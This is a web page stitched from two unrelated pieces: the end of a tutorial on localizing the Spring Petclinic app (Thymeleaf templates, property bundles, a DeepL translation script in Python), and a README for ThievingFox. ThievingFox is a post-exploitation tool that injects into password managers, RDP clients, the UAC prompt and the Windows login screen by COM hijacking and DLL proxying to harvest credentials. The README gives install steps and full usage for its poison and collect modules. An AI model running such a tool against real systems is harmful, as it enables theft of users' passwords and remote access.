the resulting text is either New Pet or Pet, depending on the presence of the attribute. This may break localization for some locales because of the agreement between the noun and the adjective. For example, in Spanish, the adjective would be Nuevo or Nueva depending on the gender of the noun, and the existing logic doesn't account for this distinction. One possible solution to this situation is to make the logic even more sophisticated. It is generally a good idea to shy away from complicated logic whenever possible, so I went with decoupling the branches instead: createOrUpdatePetForm.html: <h2> <th:block th:if="${pet['new']}" th:text="#{pet.new}">New Pet</th:block> <th:block th:unless="${pet['new']}" th:text="#{pet.update}">Pet</th:block> </h2> Separate branches will also simplify the translation process and future maintenance of the codebase. The New Pet form has a trick too. Its Type drop-down is created by passing the collection of pet types to the selectField.html template: <input th:replace="~{fragments/selectField :: select (#{pet.type}, 'type', ${types})}" /> Unlike the other UI texts, the pet types are a part of the application's data model. They are sourced from a database at runtime. The dynamic nature of this data prevents us from directly extracting the texts to a property bundle. Again, there are several ways to handle this. One way is to dynamically construct the property bundle key in the template: Before (selectField.html): <option th:each="item : ${items}" th:value="${item}" th:text="${item}">dog</option> After (selectField.html): <option th:each="item : ${items}" th:value="${item}" th:text="#{'pettype.' + ${item}}">dog</option> In this approach, rather than directly rendering cat in the UI, we prefix it with pettype, which results in pettype.cat. We then use this string as a key to retrieve the localized UI text: messages.properties: pettype.bird=bird pettype.cat=cat pettype.dog=dog messages_es.properties: pettype.bird=pájaro pettype.cat=gato pettype.dog=perro You might have noticed that we have just modified the template of a reusable component. Since reusable components are meant to serve multiple clients, it is not correct to bring client logic into it. In this particular case, the drop-down list component becomes tied to pet types, which is problematic for anyone who wants to use it for anything else. This flaw was there from the beginning – see dog as the options' default text. We just propagated this flaw further. This should not be done in real projects and needs refactoring. Of course, there is more project code to internationalize; however, the rest of it mostly aligns with the examples above. For a complete review of all my changes, you are welcome to examine [the commits in my fork (https://github.com/flounder4130/spring-petclinic). Add Missing Keys After replacing all UI text with references to property bundle keys, we must make sure to introduce all these new keys. We don't need to translate anything at this point, add the keys and original texts to the messages.properties file. IntelliJ IDEA has good Thymeleaf support. It detects if a template references a missing property, so you can spot the missing ones without lots of manual checking: With all preparations done, we get to the most interesting part of the work. We have all the keys, and we have all the values for English. Where do we get values for the other languages? Translate Texts We will create a script that uses an external translation service to translate the texts. There are plenty of translation services available and many ways to write such a script. I've made the following choices for the implementation: Python as the programming language because it allows you to program small tasks really fast DeepL as the translation service. Originally, I was planning to use OpenAI's GPT3.5 Turbo, but since it is not strictly a translation model, it requires extra effort to configure the prompt. Also, the results tend to be less stable, so I chose a dedicated translation service that first sprung to mind. I did not do extensive research, so these choices are somewhat arbitrary. Feel free to experiment and discover what best suits you. Note: If you decide to use the script below, you need to create an account with DeepL and pass your personal API key to the script through the DEEPL_KEY environment variable. This is the script: import os import requests import json deepl_key = os.getenv('DEEPL_KEY') properties_directory = "../src/main/resources/messages/" def extract_properties(text): properties = {} for line in text: line = line.strip() if line and not line.startswith('#') and '=' in line: key_value = line.split('=') key = key_value[0].strip() value = key_value[1].strip() if key and value: properties[key] = value return properties def missing_properties(properties_file, properties_checklist): with open(properties_file, 'r') as f: text = f.readlines() present_properties = extract_properties(text) missing = {k: v for k, v in properties_checklist.items() if k not in present_properties.keys()} return missing def translate_property(value, target_lang): headers = { 'Content-Type': 'application/json', 'Authorization': f'DeepL-Auth-Key {deepl_key}', 'User-Agent': 'LocalizationScript/1.0' } url = 'https://api-free.deepl.com/v2/translate' data = { 'text': [value], 'source_lang': 'EN', 'target_lang': target_lang, 'preserve_formatting': True } response = requests.post(url, headers=headers, data=json.dumps(data)) return response.json()["translations"][0]["text"] def populate_properties(file_path, properties_checklist, target_lang): with open(file_path, 'a+') as file: properties_to_translate = missing_properties(file_path, properties_checklist) for key, value in properties_to_translate.items(): new_value = translate_property(value, target_lang) property_line = f"{key}={new_value}n" print(property_line) file.write(property_line) with open(properties_directory + 'messages.properties') as base_properties_file: base_properties = extract_properties(base_properties_file) languages = [ # configure languages here "nl", "es", "fr", "de", "it", "pt", "ru", "ja", "zh", "fi" ] for language in languages: populate_properties(properties_directory + f"messages_{language}.properties", base_properties, language) The script extracts the keys from the default property bundle (messages.properties) and looks for their translations in the locale-specific bundles. If it finds a certain key lacks a translation, the script will request the translation from DeepL API and add it to the property bundle. I specified ten target languages, but you can modify the list or add your preferred languages as long as DeepL supports them. The script can be further optimized to send the texts for translation in batches of 50. I didn't do it here to keep things simple. Running the script across ten languages took ~5 minutes for me. The usage dashboard shows 8348 characters, which would have cost €0.16 if we were on a paid plan. As a result of running the script, the following files appear: messages_fi.properties messages_fr.properties messages_it.properties messages_ja.properties messages_nl.properties messages_pt.properties messages_ru.properties messages_zh.properties Also, missing properties are added to: messages_de.properties messages_es.properties But what about the results? Can we see them already? Check the results Let's relaunch the application and test it using different lang parameter values. For example: http://localhost:8080/?lang=es http://localhost:8080/?lang=nl http://localhost:8080/?lang=zh http://localhost:8080/?lang=fr Personally, I find it very satisfying to see each page correctly localized. We've put in some effort, and now it's paying off: Address the Issues The results are impressive. However, if you take a closer look, you may discover mistakes that arise from missing context. For example: visit.update = Visit Visit can be both a noun and a verb. Without additional context, the translation service produces an incorrect translation in some languages. This can be addressed either through manual editing or by adjusting the translation workflow. One possible solution is to provide context in .properties files using comments: # Noun. Heading. Displayed on the page that allows the user to edit details of a veterinary visit visit.update = Visit We can then modify the translation script to parse such comments and pass them to the context parameter: url = 'https://api-free.deepl.com/v2/translate' data = { 'text': [value], 'source_lang': 'EN', 'target_lang': target_lang, 'preserve_formatting': True, 'context': context } As we dig deeper and consider more languages, we might come across more things that need to be improved. This is an iterative process. If there's one thing that's indispensable in this process, that's review and testing. Regardless of whether we improve the automation or edit its output, we will find it necessary to conduct quality control and evaluation. Beyond the Scope Spring Petclinic is a simple, yet realistic project, just like the problems we've just solved. Of course, localization presents a lot of challenges that are out-of-scope for this article, including: adapting templates to target grammar rules currency, date, and number formats different reading patterns, such as RTL adapting UI for varying text length Each of these topics warrants a writing of its own. If you would like to read more, I will be happy to cover these topics in separate posts. Summary Alright, now that we've finished localizing our application, it's time to reflect on what we've learned: Localization is not only about translating texts – it also affects related assets, subsystems, and processes While AI is very efficient in some localization stages, human supervision and testing remain necessary to achieve the best results The quality of automatic translations depends on a variety of factors, including the availability of context and, in the case of LLMs, a properly written prompt I hope you enjoyed this article, and I'd love to hear your feedback! If you have follow-up questions or suggestions or just want to chat, don't hesitate to get in touch. To receive updates on the new posts, follow me on X or subscribe to the mailing list on my blog. See you!

pet properties Translation

ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials. The accompanying blog post can be found here Installation Linux Rustup must be installed, follow the instructions available here : https://rustup.rs/ The mingw-w64 package must be installed. On Debian, this can be done using : apt install mingw-w64 Both x86 and x86_64 windows targets must be installed for Rust: rustup target add x86_64-pc-windows-gnurustup target add i686-pc-windows-gnu Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin After adding Mono repositories, Nuget can be installed using apt : apt install nuget Finally, python dependancies must be installed : pip install -r client/requirements.txt ThievingFox works with python >= 3.11. Windows Rustup must be installed, follow the instructions available here : https://rustup.rs/ Both x86 and x86_64 windows targets must be installed for Rust: rustup target add x86_64-pc-windows-msvcrustup target add i686-pc-windows-msvc .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development" Finally, python dependancies must be installed : pip install -r client/requirements.txt ThievingFox works with python >= 3.11 NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell) Targets All modules have been tested on the following Windows versions : Windows Version Windows Server 2022 Windows Server 2019 Windows Server 2016 Windows Server 2012R2 Windows 10 Windows 11 [!CAUTION] Modules have not been tested on other version, and are expected to not work. Application Injection Method KeePass.exe AppDomainManager Injection KeePassXC.exe DLL Proxying LogonUI.exe (Windows Login Screen) COM Hijacking consent.exe (Windows UAC Popup) COM Hijacking mstsc.exe (Windows default RDP client) COM Hijacking RDCMan.exe (Sysinternals' RDP client) COM Hijacking MobaXTerm.exe (3rd party RDP client) COM Hijacking Usage [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed. ThievingFox contains 3 main modules : poison, cleanup and collect. Poison For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking. To speed up the process of compilation of all libraries, a cache is maintained in client/cache/. --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive). --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used. The KeePass modules requires the Visual C++ Redistributable to be installed on the target. Multiple applications can be specified at once, or, the --all flag can be used to target all applications. [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs. $ python3 client/ThievingFox.py poison -husage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH] [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr] [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all] targetpositional arguments: target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]options: -h, --help show this help message and exit -hashes HASHES, --hashes HASHES LM:NT hash -aesKey AESKEY, --aesKey AESKEY AES key to use for Kerberos Authentication -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version. -dc-ip DC_IP, --dc-ip DC_IP IP Address of the domain controller -no-pass, --no-pass Do not prompt for password --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox) --keepass Try to poison KeePass.exe --keepass-path KEEPASS_PATH The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/) --keepass-share KEEPASS_SHARE The share on which KeePass is installed (Default: c$) --keepassxc Try to poison KeePassXC.exe --keepassxc-path KEEPASSXC_PATH The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/) --ke epassxc-share KEEPASSXC_SHARE The share on which KeePassXC is installed (Default: c$) --mstsc Try to poison mstsc.exe --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not logged in (Default: False) --consent Try to poison Consent.exe --logonui Try to poison LogonUI.exe --rdcman Try to poison RDCMan.exe --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not logged in (Default: False) --mobaxterm Try to poison MobaXTerm.exe --mobaxterm-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not logged in (Default: False) --all Try to poison all applications Cleanup For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host. For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless. Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications. It does not clean extracted credentials on the remote host. [!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged. $ python3 client/ThievingFox.py cleanup -husage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE] [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui] [--rdcman] [--mobaxterm] [--all] targetpositional arguments: target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]options: -h, --help show this help message and exit -hashes HASHES, --hashes HASHES LM:NT hash -aesKey AESKEY, --aesKey AESKEY AES key to use for Kerberos Authentication -k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version. -dc-ip DC_IP, --dc-ip DC_IP IP Address of the domain controller -no-pass, --no-pass Do not prompt for password --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox) --keepass Try to cleanup all poisonning artifacts related to KeePass.exe --keepass-share KEEPASS_SHARE The share on which KeePass is installed (Default: c$) --keepass-path KEEPASS_PATH The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/) --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe --keepassxc-path KEEPASSXC_PATH The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/) --keepassxc-share KEEPASSXC_SHARE The share on which KeePassXC is installed (Default: c$) --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe --consent Try to cleanup all poisonning artifacts related to Consent.exe --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe --all Try to cleanup all poisonning artifacts related to all applications Collect For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:WindowsTemp<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/. Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications. $ python3 client/ThievingFox.py collect -husage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent] [--logonui] [--rdcman] [--mobaxterm] [--all] targetpositional arguments: target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]options: -h, --help show this help message and exit -hashes HASHES, --hashes HASHES LM:NT hash -aesKey AESKEY, --aesKey AESKEY AES key to use for Kerberos Authentication -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version. -dc-ip DC_IP, --dc-ip DC_IP IP Address of th e domain controller -no-pass, --no-pass Do not prompt for password --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox) --keepass Collect KeePass.exe logs --keepassxc Collect KeePassXC.exe logs --mstsc Collect mstsc.exe logs --consent Collect Consent.exe logs --logonui Collect LogonUI.exe logs --rdcman Collect RDCMan.exe logs --mobaxterm Collect MobaXTerm.exe logs --all Collect logs from all applicationsDownload ThievingFox

aesKey AESKEY hashes HASHES